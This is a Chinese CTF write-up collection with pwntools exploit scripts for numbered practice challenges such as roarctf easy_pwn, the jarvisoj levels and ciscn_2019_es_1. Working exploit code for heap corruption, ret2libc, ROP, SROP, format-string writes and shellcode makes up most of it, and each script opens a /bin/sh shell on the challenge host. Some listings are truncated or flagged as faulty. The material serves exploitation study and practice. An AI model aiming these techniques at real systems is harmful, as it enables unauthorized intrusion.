  • 在write_n那边存在一个off by one漏洞,然后又由于create使用的是calloc,所以不能正常用unsorted bin进行泄漏,然后就是用unsorted bin的特殊机制进行泄漏再进行一个(当unsorted bin只存在一个时被视为last_remainder)当再次malloc时,小于或等于它的大小时,会切割它。然后就是改malloc_hook了,这里有两种方法。(1.利用堆重叠,修改大小然后fastbin attack。2.因为特殊机制,这里将剩下的last_remainder申请回来,这样由于前面那个被extend的没有被free,所以再次申请的与前面同指向堆,然后就是free其中一个,再修改另一个。然后再次fastbin attack)不过这里注意的是这里4个one_gadget都不能用。所以用realloc_hook配合malloc_hook进行调整。
#!/usr/bin/python
#coding:utf-8

# roarctf_2019_easy_pwn: harness setup. The program allocates with calloc
# (per the writeup), which is why leak() goes through an unsorted-bin split.
from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',28202)
else:
	io=process('./roarctf_2019_easy_pwn')
elf=ELF('./roarctf_2019_easy_pwn')

def create(size):
	"""Menu option 1: allocate a chunk of ``size`` bytes."""
	for prompt, answer in (('choice: ', '1'), ('size: ', str(size))):
		io.sendlineafter(prompt, answer)

def write(index,size,content):
	"""Menu option 2: write ``size`` bytes of ``content`` into slot ``index``."""
	dialogue = (
		('choice: ', '2'),
		('index: ', str(index)),
		('size: ', str(size)),
		('content: ', content),
	)
	for prompt, answer in dialogue:
		io.sendlineafter(prompt, answer)

def drop(index):
	"""Menu option 3: free slot ``index``."""
	for prompt, answer in (('choice: ', '3'), ('index: ', str(index))):
		io.sendlineafter(prompt, answer)
	
def show(index):
	"""Menu option 4: print slot ``index`` (output left for the caller)."""
	for prompt, answer in (('choice: ', '4'), ('index: ', str(index))):
		io.sendlineafter(prompt, answer)
def leak():
	"""Overflow one byte into chunk 1's size field and leak a libc pointer via show(2).

	Returns the 6-byte pointer read after 'content: ', zero-padded to 8.
	"""
	create(0x58)#0
	create(0x60)#1
	create(0x60)#2
	create(0x60)#3
	# 0x58+10 exceeds the slot; the last byte (0xe1) lands in chunk 1's size.
	write(0,0x58+10,'a'*0x58+'\xe1')
	drop(1)
	create(0x60)#1
	show(2)
	io.recvuntil('content: ')
	leak=u64(io.recv(6).ljust(8,'\x00'))
	log.success('leak==>{}'.format(hex(leak)))
	create(0x60)#4<==>2
	return leak
def pwn(leak):
	"""Second stage: fastbin attack on __malloc_hook using realloc as a trampoline.

	Args:
		leak: value returned by leak().
	All offsets (0x68, 0x3c4b20, 0xf1147, 0x846c0, -35) are specific to the
	writeup's libc and are not derived here.
	"""
	malloc_hook_addr=leak-0x68
	libc_base=malloc_hook_addr-0x3c4b20+0x10
	log.success('libc_base==>{}'.format(hex(libc_base)))
	one_gadget = libc_base +0xf1147
	fake_chunk=malloc_hook_addr-35
	libc_realloc=libc_base+0x846c0
	#gdb.attach(io)
	#pause()
	# Same overlap construction as in leak(), on fresh slots 5..8.
	create(0x58)#5
	create(0x60)#6
	create(0x60)#7
	create(0x60)#8
	write(5,0x58+10,'a'*0x58+'\xe1')
	drop(6)
	drop(7)
	create(0xd0)#6
	payload='\x00'*0x60+p64(0)+p64(0x71)+p64(fake_chunk)+p64(0)
	write(6,len(payload),payload)
	create(0x68)#7
	create(0x68)#9
	# one_gadget goes into __realloc_hook, realloc+4 into __malloc_hook.
	payload ='\x00'*11+p64(one_gadget)+p64(libc_realloc+4)
	write(9,len(payload),payload)
	#gdb.attach(io,'b calloc')
	#pause()
	# This allocation triggers the hooks.
	create(0x10)
	io.interactive()
if __name__ =='__main__':
	# NOTE: rebinds the module-level name `leak` to the integer result.
	leak=leak()
	pwn(leak)
	
#!/usr/bin/python
#coding:utf-8

# NOTE(review): this is a truncated duplicate of the roarctf_2019_easy_pwn
# script directly above (it ends mid-leak() and has no pwn() or main).
# Kept as-is; the complete version is the first listing.
from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',28202)
else:
	io=process('./roarctf_2019_easy_pwn')
elf=ELF('./roarctf_2019_easy_pwn')

def create(size):
	"""Menu option 1: allocate a chunk of ``size`` bytes."""
	for prompt, answer in (('choice: ', '1'), ('size: ', str(size))):
		io.sendlineafter(prompt, answer)

def write(index,size,content):
	"""Menu option 2: write ``size`` bytes of ``content`` into slot ``index``."""
	dialogue = (
		('choice: ', '2'),
		('index: ', str(index)),
		('size: ', str(size)),
		('content: ', content),
	)
	for prompt, answer in dialogue:
		io.sendlineafter(prompt, answer)

def drop(index):
	"""Menu option 3: free slot ``index``."""
	for prompt, answer in (('choice: ', '3'), ('index: ', str(index))):
		io.sendlineafter(prompt, answer)
	
def show(index):
	"""Menu option 4: print slot ``index`` (output left for the caller)."""
	for prompt, answer in (('choice: ', '4'), ('index: ', str(index))):
		io.sendlineafter(prompt, answer)
def leak():
	"""Incomplete copy of leak() from the listing above.

	NOTE(review): this version stops after io.recvuntil and never reads or
	returns the leaked value; it always returns None.
	"""
	create(0x58)#0
	create(0x60)#1
	create(0x60)#2
	create(0x60)#3
	write(0,0x58+10,'a'*0x58+'\xe1')
	drop(1)
	create(0x60)#1
	show(2)
	io.recvuntil('content: ')

25.jarvisoj_level0

#!/usr/bin/python
#coding:utf-8

# jarvisoj_level0: single-send overflow into a function that calls system.
from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',27664)
else:
	io=process("./level0")

# Address quoted from the writeup.
system_addr=0x400596

payload ='a'*0x88
payload+=p64(system_addr)

io.sendline(payload)
io.interactive()

26.jarvisoj_level2

#!/usr/bin/python
#coding:utf-8

# jarvisoj_level2: 32-bit ret2plt system("/bin/sh"); p32 is used explicitly
# even though context.arch is amd64.
from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',25765)
else:
	io=process("./level2")
elf=ELF('./level2')
system_plt=elf.plt['system']
# Address of the "/bin/sh" string in the binary (from the writeup).
binsh_addr=0x0804A024

# [system@plt][fake return][arg]
payload ='a'*0x8c
payload+=p32(system_plt)
payload+=p32(0)
payload+=p32(binsh_addr)

io.sendline(payload)
io.interactive()

27.jarvisoj_level2_x64

#!/usr/bin/python
#coding:utf-8

# jarvisoj_level2_x64: ret2plt with a pop-rdi gadget for the argument.
from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',28357)
else:
	io=process("./level2_x64")
elf=ELF('./level2_x64')

system_plt=elf.plt['system']
# Gadget and string addresses quoted from the writeup.
pop_rdi=0x00000000004006b3

binsh_addr=0x600A90

payload ='a'*0x88
payload+=p64(pop_rdi)
payload+=p64(binsh_addr)
payload+=p64(system_plt)

io.sendline(payload)
io.interactive()

28.ciscn_final_2

  • 待补充。。

29.[ZJCTF 2019]Login

#!/usr/bin/python
#coding:utf-8

# [ZJCTF 2019]Login: the password field overflows into a function pointer
# (58 NUL bytes after the expected password, per the writeup).
from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',28770)
else:
	io=process('./login')
# Address quoted from the writeup; the name shadows nothing pwntools needs.
system=0x400e88

io.sendlineafter('name: ','admin')
io.sendlineafter('password: ','2jctf_pa5sw0rd'+'\x00'*58+p64(system))
io.interactive()

30.jarvisoj_tell_me_something

#!/usr/bin/python
#coding:utf-8

# jarvisoj_tell_me_something: overflow into a flag-printing function, then
# read the output.
from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',27575)
else:
	io=process('./guestbook')


# Address quoted from the writeup.
payload ='a'*0x88
payload+=p64(0x400620)

io.sendlineafter(':\n',payload)
# recv() with no size returns what arrives within context.timeout (1s).
log.success('The flag is {}'.format(io.recv()))

31.jarvisoj_level3_x64 

#!/usr/bin/python
#coding:utf-8

# jarvisoj_level3_x64: harness setup; two-stage ret2libc via write@plt.
from pwn import *
from LibcSearcher import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',25950)
else: 
	io=process('./level3_x64')

elf=ELF('./level3_x64')

write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.symbols['main']
# pop rdi;ret and pop rsi;pop r15;ret gadgets quoted from the writeup.
rdi_ret=0x4006b3
rsi_r15_ret=0x4006b1
def leak():
	"""Call write(1, write@got, ...) and return to main; return the leaked address.

	Only the first 6 bytes of the 8 written are kept (upper bytes are zero).
	"""
	payload ='a'*0x88
	payload+=p64(rdi_ret)
	payload+=p64(1)
	payload+=p64(rsi_r15_ret)
	payload+=p64(write_got)
	payload+=p64(0)
	payload+=p64(write_plt)
	payload+=p64(main_addr)
	io.sendafter('Input:\n',payload)
	write_leak=u64(io.recv(6).ljust(8,'\x00'))
	log.success('write_leak==>{}'.format(hex(write_leak)))
	return write_leak
def pwn(write_leak):
	"""Resolve system/"/bin/sh" from the leak and send the second ROP chain.

	Args:
		write_leak: value returned by leak().
	"""
	libc=LibcSearcher('write',write_leak)
	libc_base=write_leak-libc.dump('write')
	system_addr=libc.dump('system')+libc_base
	binsh_addr=libc.dump('str_bin_sh')+libc_base
	payload ='a'*0x88
	payload+=p64(rdi_ret)
	payload+=p64(binsh_addr)
	payload+=p64(system_addr)
	io.sendafter('Input:\n',payload)
	io.interactive()
	
if __name__ =='__main__':
	# leak() first; pwn() needs the leaked write address.
	write_leak=leak()
	pwn(write_leak)

32.jarvisoj_level3

#!/usr/bin/python
#coding:utf-8

# jarvisoj_level3: harness setup; 32-bit two-stage ret2libc via write@plt.
# NOTE: context.arch is set to amd64 although the payloads use p32.
from pwn import *
from LibcSearcher import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',27990)
else: 
	io=process('./level3')

elf=ELF('./level3')

write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.symbols['main']
# Gadget addresses from the writeup; unused in this script.
p_r=0x080482f1
p3_r=0x08048509
def leak():
	"""Call write(1, write@got, 8) with main as the return address; return the leak.

	NOTE(review): the target is 32-bit, yet 6 bytes are unpacked with u64;
	bytes 4-5 would come from the next GOT entry. Compare with the level4
	script, which uses u32(io.recv(4)). Not changed here.
	"""
	payload ='a'*0x8c
	payload+=p32(write_plt)
	payload+=p32(main_addr)
	payload+=p32(1)
	payload+=p32(write_got)
	payload+=p32(8)
	io.sendafter('Input:\n',payload)
	write_leak=u64(io.recv(6).ljust(8,'\x00'))
	log.success('write_leak==>{}'.format(hex(write_leak)))
	return write_leak
def pwn(write_leak):
	"""Resolve system/"/bin/sh" from the leak and send the 32-bit call frame.

	Args:
		write_leak: value returned by leak().
	"""
	libc=LibcSearcher('write',write_leak)
	libc_base=write_leak-libc.dump('write')
	system_addr=libc.dump('system')+libc_base
	binsh_addr=libc.dump('str_bin_sh')+libc_base
	payload ='a'*0x8c
	payload+=p32(system_addr)
	# Placeholder return address for system.
	payload+='dead'
	payload+=p32(binsh_addr)
	io.sendafter('Input:\n',payload)
	io.interactive()
	
if __name__ =='__main__':
	# leak() first; pwn() needs the leaked write address.
	write_leak=leak()
	pwn(write_leak)

33.roarctf_2019_realloc_magic

34.jarvisoj_level4

#!/usr/bin/python
#coding:utf-8

# jarvisoj_level4: harness setup; 32-bit two-stage ret2libc via write@plt.
# NOTE: context.arch is set to amd64 although the payloads use p32.
from pwn import *
from LibcSearcher import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',29684)
else: 
	io=process('./level4')

elf=ELF('./level4')

write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.symbols['main']
# Gadget addresses from the writeup; unused in this script.
p_r=0x080482f1
p3_r=0x08048509
def leak():
	"""Call write(1, write@got, 4) with main as the return address; return the leak."""
	payload ='a'*0x8c
	payload+=p32(write_plt)
	payload+=p32(main_addr)
	payload+=p32(1)
	payload+=p32(write_got)
	payload+=p32(4)
	# No prompt is awaited here (this binary prints nothing first).
	io.sendline(payload)
	write_leak=u32(io.recv(4).ljust(4,'\x00'))
	log.success('write_leak==>{}'.format(hex(write_leak)))
	return write_leak
def pwn(write_leak):
	"""Resolve system/"/bin/sh" from the leak and send the 32-bit call frame.

	Args:
		write_leak: value returned by leak().
	NOTE(review): the second stage waits for 'Input:\\n' although leak()
	sent without waiting for a prompt; whether main prints it is not
	visible here.
	"""
	libc=LibcSearcher('write',write_leak)
	libc_base=write_leak-libc.dump('write')
	system_addr=libc.dump('system')+libc_base
	binsh_addr=libc.dump('str_bin_sh')+libc_base
	payload ='a'*0x8c
	payload+=p32(system_addr)
	# Placeholder return address for system.
	payload+='dead'
	payload+=p32(binsh_addr)
	io.sendlineafter('Input:\n',payload)
	io.interactive()
	
if __name__ =='__main__':
	# leak() first; pwn() needs the leaked write address.
	write_leak=leak()
	pwn(write_leak)

35.[Black Watch 入群题]PWN

#!/usr/bin/python
#coding:utf-8

# [Black Watch 入群题]PWN: 32-bit stack pivot into a .bss buffer. Stage 1
# writes a ROP chain into the "name" buffer and pivots with leave;ret to
# leak write@got; stage 2 repeats the pivot with a system("/bin/sh") frame.
# No context.update here: pwntools defaults (i386) apply.
from pwn import *
from LibcSearcher import *

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',25115)
else:
	io=process('./spwn')
elf=ELF('./spwn')

# Addresses quoted from the writeup. fake_bss duplicates s_addr and is
# not used below.
s_addr=0x0804a300
leave_ret=0x08048408
write_plt=elf.plt['write']
write_got=elf.got['write']
fake_bss=0x0804a300
ps_pd_pb_r=0x080485a9
start_addr=0x080483a0
# Trailing comments are byte offsets inside the .bss buffer.
payload ='a'*4 #4
payload+=p32(write_plt)
payload+=p32(ps_pd_pb_r)
payload+=p32(1) #8
payload+=p32(write_got) #c
payload+=p32(4) #10
payload+=p32(start_addr)



#gdb.attach(io,'b *0x8048524')
#pause()
io.sendafter('name?',payload)
# Second input overwrites saved ebp with s_addr and the return address
# with leave;ret, so the chain above becomes the stack.
payload ='a'*0x18
payload+=p32(s_addr)
payload+=p32(leave_ret)
io.sendafter('say?',payload)
write_got_leak=u32(io.recv(4).ljust(4,'\x00'))
log.success('write_got_leak==>{}'.format(hex(write_got_leak)))
libc=LibcSearcher('write',write_got_leak)
libc_base=write_got_leak-libc.dump('write')
system_addr=libc.dump('system')+libc_base
binsh_addr=libc.dump('str_bin_sh')+libc_base
log.success('libc_base==>{}'.format(hex(libc_base)))
log.success('system_addr==>{}'.format(hex(system_addr)))
log.success('binsh_addr==>{}'.format(hex(binsh_addr)))



payload ='a'*4
payload+=p32(system_addr)
payload+=p32(0)
payload+=p32(binsh_addr)
io.sendafter('name?',payload)

payload ='a'*0x18
payload+=p32(s_addr)
payload+=p32(leave_ret)
io.sendafter('say?',payload)
io.interactive()

36.others_shellcode

#!/usr/bin/python
#coding:utf-8

# others_shellcode: the challenge already drops into a shell; this script
# only connects and hands the session to the user.
from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',25013)
else:
	io=process('./shell_asm')
io.interactive()

37.jarvisoj_fm

#!/usr/bin/python
#coding:utf-8

# jarvisoj_fm: single format-string write (%n) to the address quoted in
# the writeup; argument index 11.
from pwn import *
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',25721)
else:
	io=process('./fm')
	
payload =p32(0x0804A02C)
payload+='%11$n'
io.sendline(payload)
io.interactive()

38.axb_2019_fmt32

#!/usr/bin/python
#coding:utf-8

# axb_2019_fmt32: harness setup; 32-bit format-string read then write.
from pwn import *
from LibcSearcher import *
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',26542)
else:
	io=process('./axb_2019_fmt32')
elf=ELF('./axb_2019_fmt32')
printf_got=elf.got['printf']

def leak(addr):	
	"""Read 4 bytes at ``addr`` through '%8$s' and return them as an int.

	The leading 'a' aligns the address to argument slot 8 (per the writeup);
	the program echoes the input after 'Repeater:', so the 4-byte address
	itself is skipped before reading the dereferenced value.
	"""
	payload ='a'+p32(addr)+'%8$s'
	io.sendlineafter("Please tell me:",payload)
	io.recvuntil('Repeater:a')
	io.recv(4)
	leak=u32(io.recv(4))
	log.success('printf_got_leak==>{}'.format(hex(leak)))
	return leak
def pwn(printf_leak):
	"""Redirect printf@got to system with fmtstr_payload, then send a command.

	Args:
		printf_leak: value returned by leak(printf_got).
	numbwritten=0xa accounts for the bytes the program prints before the
	payload ('Repeater:' plus the leading 'a'), per the writeup.
	"""
	libc=LibcSearcher("printf",printf_leak)
	system_addr=printf_leak-libc.dump("printf")+libc.dump("system")
	log.success('system_addr==>{}'.format(hex(system_addr)))
	#gdb.attach(io,'b *0x0804874b')
	#pause()
	payload ='a'+fmtstr_payload(8,{printf_got:system_addr},numbwritten=0xa)
	io.sendlineafter("Please tell me:",payload)
	
	# Once printf is system, the echoed input is executed as a command.
	io.sendline(";/bin/sh\x00")
	io.interactive()

if __name__ == '__main__':
	# leak() first; pwn() needs the resolved printf address.
	printf_leak=leak(printf_got)
	pwn(printf_leak)

39.bjdctf_2020_babystack

#!/usr/bin/python
#coding:utf-8

# bjdctf_2020_babystack: the first input sets the read length ('100'), the
# second overflows the return address with the backdoor address from the
# writeup.
from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',29986)
else:
	io=process('./bjdctf_2020_babystack')
	
payload ='100'
io.sendlineafter('name:\n',payload)
payload ='a'*0x18
payload+=p64(0x4006e7)
io.sendlineafter('name?\n',payload)
io.interactive()

40.强网杯2019 拟态 STKOF

#!/usr/bin/python
#coding:utf-8

# 强网杯2019 拟态 STKOF: one payload that works whether the binary is run as
# 32-bit or 64-bit ("mimic"): a 64-bit read+execve chain followed by a
# 32-bit read+execve chain, with a 32-bit gadget that skips over the
# 64-bit part. All addresses are quoted from the writeup.
from pwn import *

context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',25839)
else:
	io=process('./pwn2')

#32
a_r=0x080a8af6
d_c_b_r=0x0806e9f1
int_0x80=0x806f2ff
add_esp_sub_eax_edx=0x0806b225
#64
p_ax=0x000000000043b97c
p_di=0x00000000004005f6
p_si=0x0000000000405895
p_dx=0x000000000043b9d5
syscall_addr=0x0000000000461645
payload_padding ='a'*0x110+p32(add_esp_sub_eax_edx)+p32(0)
# 64-bit: read(0, 0x69e200, 0x200) then execve(0x69e200, 0, 0).
payload64=p64(p_ax)+p64(0x0)+p64(p_si)+p64(0x0069e200)+p64(p_di)+p64(0)+p64(p_dx)+p64(0x200)+p64(syscall_addr)+p64(p_ax)+p64(0x3b)+p64(p_di)+p64(0x0069e200)+p64(p_si)+p64(0)+p64(p_dx)+p64(0)+p64(syscall_addr)
# Padded so the 32-bit chain starts at the fixed offset the esp gadget reaches.
payload64=payload64.ljust(0x100-4,'\x00')

# 32-bit: read(0, 0x80d7200, 0x200) then execve(0x80d7200, 0, 0).
payload32=p32(d_c_b_r)+p32(0x200)+p32(0x080d7200)+p32(0)+p32(a_r)+p32(3)+p32(int_0x80)+p32(d_c_b_r)+p32(0)+p32(0)+p32(0x080d7200)+p32(a_r)+p32(0xb)+p32(int_0x80)
payload=payload_padding+payload64+payload32
#gdb.attach(io,'b *0x804892f')
#pause()
io.sendline(payload)
# Fixed delay before supplying the string read by the chain.
sleep(1)
io.sendline('/bin/sh\x00')

io.interactive()

42.ciscn_2019_es_1

  • 第一个exp是用来打远程的,由于buu的靶机是ubuntu18,使用的是2.27版本,所以存在tcache,但是2.29之前的由于缺少检查机制,导致使用double free比较简单,直接两次free,不需要中间插一个绕过检查。然后这题思路也比较平常,先leak,但是leak的时候要把tcache填满0x400。然后正常的tcache attack。
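#!/usr/bin/python
#coding:utf-8

# ciscn_2019_es_1 (remote variant, glibc 2.27 per the writeup): harness
# setup. The stray ',' that preceded the shebang in the page rendering is
# removed; it made the listing a syntax error.
from pwn import *
from LibcSearcher import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

# `Q=1` selects the practice instance; otherwise the local binary.
if args.Q:
	io=remote('node3.buuoj.cn',26317)
else:
	io=process(['./ciscn_2019_es_1'])
elf=ELF('./ciscn_2019_es_1')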

def add(size,name,phone):
	"""Menu option 1: add an entry of ``size`` bytes with ``name`` and ``phone``.

	The size is sent as a line; name and phone are sent raw (no newline).
	"""
	io.sendlineafter('choice:', '1')
	io.sendlineafter('name\n', str(size))
	for prompt, raw in (('name:\n', name), ('call:\n', phone)):
		io.sendafter(prompt, raw)

def show(index):
	"""Menu option 2: print entry ``index`` (output left for the caller)."""
	for prompt, answer in (('choice:', '2'), ('index:\n', str(index))):
		io.sendlineafter(prompt, answer)

def call(index):
	"""Menu option 3: free entry ``index`` (the program's "call" action)."""
	for prompt, answer in (('choice:', '3'), ('index:\n', str(index))):
		io.sendlineafter(prompt, answer)


def leak():
	add(0x410,'a','a')#0
	add(0x10,'/bin/sh\x00','a')#1
	call(0)
	show(0)
	io.recvuntil('name:\n')
	leak=u64(io.recv(6).ljust(8,'\x00'))
	log.success('unsort_bin_leak==>{}'.format(hex(leak)))
	add(0x390,'a','a')#2=0
	return leak
def pwn(leak):
	malloc_hook=leak-0x70
	libc=LibcSearcher('__malloc_hook',malloc_hook)
	libc_base=malloc_hook-libc.dump('__malloc_hook')
	free_hook=libc_base+libc.dump('__free_hook')
	system_addr=libc_base+libc.dump('system')
	log.success('libc_base==>{}'.format(hex(libc_base)))
	log.success('free_hook==>{}'.format(hex(free_hook)))
	log.success('system_addr==>{}'.format(hex(system_addr)))
	add(0x60,'a','a')#3
	call(3)
	call(3)
	add(0x60,p64(free_hook),'a')
	add(0x60,p64(free_hook),'a')
	add(0x60,p64(system_addr),'a')
	call(1)
	io.interactive()
	
	
	
if __name__=='__main__':
	leak=leak()
	pwn(leak)
  • 第二个exp是用来打本地的,ubuntu16,思路跟上面的差不多。也是先leak,然后在fastbin attack (double free)。

43.jarvisoj_test_your_memory

#!usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='i386',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',26203)
else:
	io=process('./memory')
elf=ELF('./memory')
cat_flag=0x80487e0
system_addr=0x08048440
payload ='a'*23
payload+=p32(system_addr)
payload+=p32(0x08048667)
payload+=p32(cat_flag)
gdb.attach(io,'b main')
pause()
io.sendlineafter('> ',payload)
flag=io.recvline()
log.success('flag is :{}'.format(flag))

44.铁人三项(第五赛区)_2018_rop

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',28225)
else:
	io=process(['./2018_rop'])
elf=ELF('./2018_rop')
p3_r=0x0804855d
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.symbols['main']
def leak():
	payload ='a'*0x8c
	payload+=p32(write_plt)
	payload+=p32(p3_r)
	payload+=p32(1)
	payload+=p32(write_got)
	payload+=p32(4)
	payload+=p32(main_addr)
	io.sendline(payload)
	leak=u32(io.recv(4).ljust(4,'\x00'))
	log.success('write_leak==>{}'.format(hex(leak)))
	return leak
def pwn(leak):
	libc=LibcSearcher('write',leak)
	libc_base=leak-libc.dump('write')
	system_addr=libc_base+libc.dump('system')
	binsh_addr=libc_base+libc.dump('str_bin_sh')
	payload ='a'*0x8c
	payload+=p32(system_addr)
	payload+=p32(0)
	payload+=p32(binsh_addr)
	io.sendline(payload)
	io.interactive()
if __name__=='__main__':
	leak=leak()
	pwn(leak)

45. inndy_stack z

46.jarvisoj_level1

  • 这题由于远程的接受错位问题导致本地与远程两种不同的做法,但是远程的也可以拿来打本地的。
  • exp1打本地。
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',27048)
else:
	io=process('./level1')

io.recvuntil('this:')
buf_addr=io.recv(10)
log.success('buf_addr==>{}'.format(buf_addr))
buf_addr=int(buf_addr,16)
shellcode=asm(shellcraft.sh())
payload =shellcode
payload=payload.ljust(0x8c,'\x00')
payload+=p32(buf_addr)
io.sendline(payload)
io.interactive()
  • exp2打远程。
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',27048)
else:
	io=process('./level1')
elf=ELF('./level1')
bss_addr=elf.bss()
read_plt=elf.plt['read']
p3_r=0x08048549
shellcode=asm(shellcraft.sh())
payload ='a'*0x8c
payload+=p32(read_plt)
payload+=p32(p3_r)
payload+=p32(0)
payload+=p32(bss_addr)
payload+=p32(0x200)
payload+=p32(bss_addr)
io.sendline(payload)
sleep(0.2)
io.sendline(shellcode)

io.interactive()

47.bjdctf_2020_babyrop

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',28411)
else:
	io=process('./bjdctf_2020_babyrop')
elf=ELF('./bjdctf_2020_babyrop')
pd_r=0x0000000000400733
main_addr=elf.symbols['main']
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
def leak():
	payload ='a'*0x28
	payload+=p64(pd_r)
	payload+=p64(puts_got)
	payload+=p64(puts_plt)
	payload+=p64(main_addr)
	io.sendlineafter('!\n',payload)
	print io.recv()
	leak=u64(io.recv(6).ljust(8,'\x00'))
	log.success('puts_leak==>{}'.format(hex(leak)))
	return leak
def pwn(leak):
	libc=LibcSearcher('puts',leak)
	libc_base=leak-libc.dump('puts')
	system_addr=libc_base+libc.dump('system')
	binsh_addr=libc_base+libc.dump('str_bin_sh')
	payload ='a'*0x28
	payload+=p64(pd_r)
	payload+=p64(binsh_addr)
	payload+=p64(system_addr)
	payload+=p64(0)
	io.sendlineafter('!\n',payload)
	io.interactive()
if __name__=='__main__':
	leak=leak()
	pwn(leak)

48.ciscn_2019_es_7

#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',25836)
else:
	io=process('./ciscn_2019_es_7')
main_addr=0x4004f1
syscall_ret=0x400517
gadget_addr=0x4004da

payload ='/bin/sh\x00'.ljust(16,'a')
payload+=p64(main_addr)
io.sendline(payload)
io.recv(0x20)
binsh_addr=u64(io.recv(6).ljust(8,'\x00'))-0x118
log.success('binsh_addr==>{}'.format(hex(binsh_addr)))
frameExecve=SigreturnFrame()
frameExecve.rax=constants.SYS_execve
frameExecve.rdi=binsh_addr
frameExecve.rsi=0
frameExecve.rdx=0
frameExecve.rip=syscall_ret


payload='a'*16
payload+=p64(gadget_addr)
payload+=p64(syscall_ret)
payload+=str(frameExecve)
io.sendline(payload)
io.interactive()

49.hitcontraining_uaf

  • UAF,自带后门。
#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',29630)
else:
	io=process('./hacknote')


magic=0x08048945
def add(size,content='a'):
	io.sendlineafter('choice :','1')
	io.sendlineafter('size :',str(size))
	io.sendafter('content :',content)

def dele(index):
	io.sendlineafter('choice :','2')
	io.sendlineafter('Index :',str(index))

def show(index):	
	io.sendlineafter('choice :','3')
	io.sendlineafter('Index :',str(index))
	
def pwn():
	add(30)#0
	add(30)#1
	dele(0)
	dele(1)
	add(8,p32(magic))#chunk=2,content=1
	show(0)
	io.interactive()
	
	
if __name__=='__main__':
	pwn()

50.bbys_tu_2016

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'


if args.Q:
	io=remote('node3.buuoj.cn',27505)
else:
	io=process('./bbys_tu_2016')
	
payload ='a'*24
payload+=p32(0x804856d)
io.sendline(payload)
for i in range(2):
	io.recvline()
log.success('flag is :{}'.format(io.recvline()))

51.xdctf2015_pwn200

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'


if args.Q:
	io=remote('node3.buuoj.cn',29592)
else:
	io=process('./bof')
elf=ELF('./bof')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']	
def leak():
	payload ='a'*0x70
	payload+=p32(write_plt)
	payload+=p32(main_addr)
	payload+=p32(1)
	payload+=p32(write_got)
	payload+=p32(4)
	io.sendlineafter('!\n',payload)
	write_leak=u32(io.recv(4))
